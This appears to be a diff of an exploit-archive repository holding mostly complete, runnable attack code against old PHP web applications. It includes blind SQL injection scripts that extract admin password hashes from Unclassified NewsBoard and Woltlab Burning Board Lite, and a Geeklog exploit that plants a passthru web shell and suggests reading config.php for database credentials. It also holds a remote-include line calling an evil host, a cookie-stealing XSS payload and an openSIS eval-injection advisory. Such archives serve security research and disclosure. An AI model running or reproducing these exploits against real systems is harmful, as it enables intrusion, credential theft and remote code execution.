?>
# milw0rm.com [2005-11-14]
<?php
# ---UNB153pl3_xpl.php 11.35 12/11/2005 #
# #
# Unclassified NewsBoard 1.5.3 patch level 3 "Datefrom" blind SQL #
# injection / Admin MD5 password hash dump #
# by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-tzu:"If he is taking his ease, give him no rest. If his forces are #
# united, separate them." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> Unclassified NewsBoard 1.5.3pl3 blind SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Unclassified NewsBoard 1.5.3pl3 blind SQL injection </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value"> <p> <input type="text" name="host"> <span
class="Stile5"> * hostname (ex: www.sitename.com) </span> </p> <p> <input
type="text" name="path"> <span class="Stile5"> * path ( ex: /unb/ or just / )
</span></p><p> <input type="text" name="fullpath"><span class="Stile5"> * full
path to site, need this for "INTO OUTFILE" statement (ex.: C:\\\www\\\site\\\)
</span></p><p> <input type="text" name="table_prefix"> <span class="Stile5">
specify a table prefix other than the default (unb1_)</span> </p><p><input
type="text" name="port"> <span class="Stile5">specify a port other than 80
( default value ) </span> </p> <p> <input type="text" name="proxy"> <span
class="Stile5"> send exploit through an HTTP proxy (ip:port) </span></p><p>
<input type="submit"name="Submit" value="go!"> </p> </form> </td> </tr> </table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($host<>"") and ($path<>"") and ($fullpath<>""))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($table_prefix=='') {$table_prefix="unb1_";}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#STEP 1 -> Dump Admin MD5 password hash...
$SQL="9999999999) UNION SELECT ORD(SUBSTRING(Password,1,1)),ORD(SUBSTRING(Password,2,1)),ORD(SUBSTRING(Password,3,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,4,1)),ORD(SUBSTRING(Password,5,1)),ORD(SUBSTRING(Password,6,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,7,1)),ORD(SUBSTRING(Password,8,1)),ORD(SUBSTRING(Password,9,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,10,1)),ORD(SUBSTRING(Password,11,1)),ORD(SUBSTRING(Password,12,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,13,1)),ORD(SUBSTRING(Password,14,1)),ORD(SUBSTRING(Password,15,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,16,1)),ORD(SUBSTRING(Password,17,1)),ORD(SUBSTRING(Password,18,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,19,1)),ORD(SUBSTRING(Password,20,1)),ORD(SUBSTRING(Password,21,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,22,1)),ORD(SUBSTRING(Password,23,1)),ORD(SUBSTRING(Password,24,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,25,1)),ORD(SUBSTRING(Password,26,1)),ORD(SUBSTRING(Password,27,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,28,1)),ORD(SUBSTRING(Password,29,1)),ORD(SUBSTRING(Password,30,1)) FROM ".$table_prefix."users WHERE ID=1
UNION SELECT ORD(SUBSTRING(Password,31,1)),ORD(SUBSTRING(Password,32,1)),NULL INTO OUTFILE '".$fullpath."suntzu' FROM ".$table_prefix."users WHERE ID=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?req=search&Query=suntzu&ResultView=2&Sort=2&DateFrom=".$SQL."&DateUntil=&Forum=0 HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."forum.php?req=search&unb236sess=\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#STEP 2 -> Retrieve dump and decode...
$packet="GET ".$p."suntzu HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("200 OK",$html))
{
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$dump=$temp[1];
$temp2=''; $HASH='';
for ($i=0; $i<=strlen($dump)-1; $i++)
{
if (($dump[$i]==chr(0x09)) or ($dump[$i]==chr(0x0a)))
{$HASH.=chr($temp2); $temp2='';}
else
{$temp2.=$dump[$i]; if ($temp2=="\N") {break;} }
}
echo "<br>Exploit succeeded -> ".$HASH;
}
else
{echo "Exploit failed...";}
}
else
{echo "Fill * requested fields, optionally specify a proxy...";}
?>
# milw0rm.com [2005-11-14]

6
platforms/php/webapps/138.pl
View file

@ -92,6 +92,6 @@ while ($answer = <$socket>)
print "[+] USER: $1 \n[+] MD5 HASH: $6\n";
}
}
if ($success == 0) { print "[-] exploit failed =(\n"; }
# milw0rm.com [2003-12-21]
if ($success == 0) { print "[-] exploit failed =(\n"; }
# milw0rm.com [2003-12-21]

130
platforms/php/webapps/1515.pl
View file

@ -1,65 +1,65 @@
#!/usr/bin/perl -w
use IO::Socket;
print "*************************************************************************\r\n";
print "| Geeklog 1.* remote commands execution |\r\n";
print "| By rgod rgod<AT>autistici<DOT>org |\r\n";
print "| site: http://retrogod.altervista.org |\r\n";
print "| |\r\n";
print "*************************************************************************\r\n";
print "| -> this works against magic_quotes_gpc = Off |\r\n";
print "*************************************************************************\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}
$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
if (@ARGV < 3)
{
print "Usage:\r\n";
print "perl pblg_xpl.pl SERVER PATH COMMAND\r\n\r\n";
print "SERVER - Server where Geeklog is installed.\r\n";
print "PATH - Path to Geeklog (ex: /geeklog/ or just /) \r\n";
print "COMMAND - a shell command (\"cat ./../config.php\" to see database\r\n";
print " username & password\")\r\n";
print "Example:\r\n";
print "perl geeklog_14_xpl.pl localhost /geeklog/ ls -la \r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
$shell=urlEncode($shell);
$data="loginname=sun&passwd=sun";
print $sock "POST ".$path."users.php HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Content-Length: ".length($data)."\r\n";
print $sock "Cookie: gl_session=%27".$shell."\r\n";
print $sock "Connection: Close\r\n\r\n";
print $sock $data;
close($sock);
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$xpl="../logs/error.log";
$xpl=urlEncode($xpl)."%00";
print $sock "GET ".$path."index.php?CMD=".$cmd." HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Cookie: language=".$xpl.";\r\n";
print $sock "Connection: Close\r\n\r\n";
while ($answer = <$sock>) {
print $answer;
}
close($sock);
# milw0rm.com [2006-02-20]
#!/usr/bin/perl -w
use IO::Socket;
print "*************************************************************************\r\n";
print "| Geeklog 1.* remote commands execution |\r\n";
print "| By rgod rgod<AT>autistici<DOT>org |\r\n";
print "| site: http://retrogod.altervista.org |\r\n";
print "| |\r\n";
print "*************************************************************************\r\n";
print "| -> this works against magic_quotes_gpc = Off |\r\n";
print "*************************************************************************\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}
$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
if (@ARGV < 3)
{
print "Usage:\r\n";
print "perl pblg_xpl.pl SERVER PATH COMMAND\r\n\r\n";
print "SERVER - Server where Geeklog is installed.\r\n";
print "PATH - Path to Geeklog (ex: /geeklog/ or just /) \r\n";
print "COMMAND - a shell command (\"cat ./../config.php\" to see database\r\n";
print " username & password\")\r\n";
print "Example:\r\n";
print "perl geeklog_14_xpl.pl localhost /geeklog/ ls -la \r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
$shell=urlEncode($shell);
$data="loginname=sun&passwd=sun";
print $sock "POST ".$path."users.php HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Content-Length: ".length($data)."\r\n";
print $sock "Cookie: gl_session=%27".$shell."\r\n";
print $sock "Connection: Close\r\n\r\n";
print $sock $data;
close($sock);
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
$xpl="../logs/error.log";
$xpl=urlEncode($xpl)."%00";
print $sock "GET ".$path."index.php?CMD=".$cmd." HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Cookie: language=".$xpl.";\r\n";
print $sock "Connection: Close\r\n\r\n";
while ($answer = <$sock>) {
print $answer;
}
close($sock);
# milw0rm.com [2006-02-20]

72
platforms/php/webapps/2318.txt
View file

@ -1,36 +1,36 @@
###########################################################
#Web Server Creator v0.1 (l) Remote Include Vulnerability
############################################################
#Author: XORON
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#cont@ct: x0r0n[at]hotmail[dot]com
############################################################
#Code: include $l;
############################################################
#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?
############################################################
#Greetz: str0ke, Ironfist, Preddy, SHiKaA, gültekin
############################################################
# milw0rm.com [2006-09-07]
###########################################################
#Web Server Creator v0.1 (l) Remote Include Vulnerability
############################################################
#Author: XORON
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#cont@ct: x0r0n[at]hotmail[dot]com
############################################################
#Code: include $l;
############################################################
#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?
############################################################
#Greetz: str0ke, Ironfist, Preddy, SHiKaA, gültekin
############################################################
# milw0rm.com [2006-09-07]

430
platforms/php/webapps/2842.php
View file

@ -1,215 +1,215 @@
<?php
print_r('
--------------------------------------------------------------------------------
Woltlab Burning Board Lite 1.0.2 Zend_Hash_Del_Key_Or_Index /
/ blind sql injection exploit
by rgod retrog@alice.it
site: http://retrogod.altervista.org
dork: "Powered by Burning Board Lite 1.0.2 * 2001-2004"
--------------------------------------------------------------------------------
');
/*
magic_quotes_gpc=Off
works with register_globals = On
PHP < 4.4.3, 5 <= PHP < 5.1.4
*/
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to wbblite
Options:
-u[userid]: specify the userid of your target (default: 1, admin)
-p[port]: " a port other than 80
-P[ip:port]: " a proxy
-t[n]: adjust query timeout (default: 10)
-b[n]: " the delay for benchmark()
Example:
php '.$argv[0].' localhost /wbblite/ -P1.1.1.1:80
" " localhost / -u2 -p81
" " localhost /forum/ -t15 -b20000000
" " localhost / -t15 -b20000000
---------------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$uid=1;
$port=80;
$timeout=10;
$proxy="";
$b=100000000;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
$timeout=(int) str_replace("-t","",$argv[$i]);
}
if ($temp=="-b")
{
$b=(int) str_replace("-b","",$argv[$i]);
}
if ($temp=="-u")
{
$uid=(int) str_replace("-b","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data ="wbb_userid=%27";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)){
echo "vulnerable...\n";
$temp=explode("users LEFT JOIN",$html);$temp2=explode("FROM ",$temp[0]);$prefix=$temp2[1];
echo "prefix -> ".$prefix."\n";
}
else
{die("not vulnerable...");}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="9999999'/**/OR/**/".$prefix."users.userid=$uid/**/AND/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),BENCHMARK(".$b.",CHAR(0)),-1))/**/LIMIT/**/1/*";
$sql=urlencode($sql);
$data ="wbb_userid=$sql";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)) {
die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version...");
}
usleep(20000);
$starttime=time();
echo "starttime -> ".$starttime."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
print_r('
--------------------------------------------------------------------------
cookie -> wbb_userid='.$uid.'; wbb_userpassword='.$hash.';
--------------------------------------------------------------------------
');
if ($uid==1) {
echo "done, but... to have access to admin panel you need to break the hash\n";
}
}
else {
echo "exploit failed...";
}
?>
# milw0rm.com [2006-11-23]
<?php
print_r('
--------------------------------------------------------------------------------
Woltlab Burning Board Lite 1.0.2 Zend_Hash_Del_Key_Or_Index /
/ blind sql injection exploit
by rgod retrog@alice.it
site: http://retrogod.altervista.org
dork: "Powered by Burning Board Lite 1.0.2 * 2001-2004"
--------------------------------------------------------------------------------
');
/*
magic_quotes_gpc=Off
works with register_globals = On
PHP < 4.4.3, 5 <= PHP < 5.1.4
*/
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to wbblite
Options:
-u[userid]: specify the userid of your target (default: 1, admin)
-p[port]: " a port other than 80
-P[ip:port]: " a proxy
-t[n]: adjust query timeout (default: 10)
-b[n]: " the delay for benchmark()
Example:
php '.$argv[0].' localhost /wbblite/ -P1.1.1.1:80
" " localhost / -u2 -p81
" " localhost /forum/ -t15 -b20000000
" " localhost / -t15 -b20000000
---------------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$uid=1;
$port=80;
$timeout=10;
$proxy="";
$b=100000000;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
$timeout=(int) str_replace("-t","",$argv[$i]);
}
if ($temp=="-b")
{
$b=(int) str_replace("-b","",$argv[$i]);
}
if ($temp=="-u")
{
$uid=(int) str_replace("-b","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data ="wbb_userid=%27";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)){
echo "vulnerable...\n";
$temp=explode("users LEFT JOIN",$html);$temp2=explode("FROM ",$temp[0]);$prefix=$temp2[1];
echo "prefix -> ".$prefix."\n";
}
else
{die("not vulnerable...");}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="9999999'/**/OR/**/".$prefix."users.userid=$uid/**/AND/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),BENCHMARK(".$b.",CHAR(0)),-1))/**/LIMIT/**/1/*";
$sql=urlencode($sql);
$data ="wbb_userid=$sql";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)) {
die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version...");
}
usleep(20000);
$starttime=time();
echo "starttime -> ".$starttime."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
print_r('
--------------------------------------------------------------------------
cookie -> wbb_userid='.$uid.'; wbb_userpassword='.$hash.';
--------------------------------------------------------------------------
');
if ($uid==1) {
echo "done, but... to have access to admin panel you need to break the hash\n";
}
}
else {
echo "exploit failed...";
}
?>
# milw0rm.com [2006-11-23]

2
platforms/php/webapps/30002.txt
View file

@ -19,6 +19,8 @@
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################
##############

72
platforms/php/webapps/30057.txt
View file

@ -1,72 +0,0 @@
----------------------------------------------------------
openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability
----------------------------------------------------------
[-] Software Link:
http://www.opensis.com/
[-] Affected Versions:
All versions from 4.5 to 5.2.
[-] Vulnerability Description:
The vulnerable code is located in the /ajax.php script:
86. if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
87. {
88. if($_REQUEST['_openSIS_PDF']=='true')
89. ob_start();
90. if(strpos($_REQUEST['modname'],'?')!==false)
91. {
92. $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
93. $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
94.
95. $vars = explode('?',$vars);
96. foreach($vars as $code)
97. {
98. $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';");
99. eval($code);
100. }
101. }
User input passed through the "modname" request variable is not properly sanitized before being used in
a call to the eval() function at line 99. This can be exploited to inject and execute arbitrary PHP code.
[-] Solution:
As of December 5th, 2013 the only solution is this patch: http://sourceforge.net/p/opensis-ce/code/1009
[-] Disclosure Timeline:
[04/12/2012] - Issue reported to http://sourceforge.net/p/opensis-ce/bugs/59/
[28/12/2012] - Vendor contacted, replied that the next version will fix the issue
[12/01/2013] - CVE number requested
[14/01/2013] - CVE number assigned
[26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
[12/05/2013] - Vendor contacted again
[15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
[04/12/2013] - After one year still no official solution available
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1349 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-10

37
platforms/php/webapps/30105.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Wordpress Plugin: Wordpress Download Manager Free & Pro
Persistent Cross Site Scripting
# Google Dork:
# Date: 12-06-2013
# Exploit Author: IT Nerdbox
# Vendor Homepage: http://www.wpdownloadmanager.com # Software Link:
http://downloads.wordpress.org/plugin/download-manager.zip
# Version: v3.3.8
# Tested on: Wordpress 3.7.1 on Linux CentOS # CVE : N/A
When creating a new download package you need to enter a title, description
and the file(s) that you want to be available for download. The title input
field is not sanitized and therefor vulnerable to persistent cross site
scripting. The payload used is <input onmouseover=prompt(document.cookie)>
More information, including screenshots, can be found at:
http://www.nerdbox.it/wordpress-download-manager-xss/

171
platforms/php/webapps/30107.txt Executable file
View file

@ -0,0 +1,171 @@
###########################################################
